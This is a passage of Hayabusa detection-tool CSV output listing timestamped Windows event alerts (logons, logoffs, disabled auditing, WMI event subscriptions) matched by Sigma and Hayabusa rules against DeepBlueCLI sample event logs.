.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:31:43.146 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:33:09.568 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:34:07.677 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:35:01.052 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:36:08.912 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:40:11.872 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:41:14.715 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:42:51.887 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:23.564 +09:00,IE10Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event 